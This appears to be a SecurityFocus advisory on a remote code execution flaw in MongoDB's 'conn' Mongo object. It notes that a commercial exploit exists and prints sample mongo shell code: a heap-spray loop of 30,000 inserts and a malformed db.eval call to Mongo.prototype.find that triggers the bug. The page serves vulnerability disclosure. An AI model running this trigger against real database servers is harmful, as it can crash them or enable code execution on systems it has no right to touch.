MongoDB 'conn' Mongo Object Remote Code Execution Vulnerability

Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The following example data is available:

use databaseMapped

sizechunk=0x1338; chunk=""; for(i=0;i<sizechunk;i++){ chunk+="\x05\x7c\x77\x55\x08\x04\x00\x00"; } for(i=0;i<30000;i++){ db.my_collection.insert({my_chunk:chunk}) }

db.eval('Mongo.prototype.find("a",{"b":"c"},"d","e","f","g","h")');


 

Privacy Statement
Copyright 2010, SecurityFocus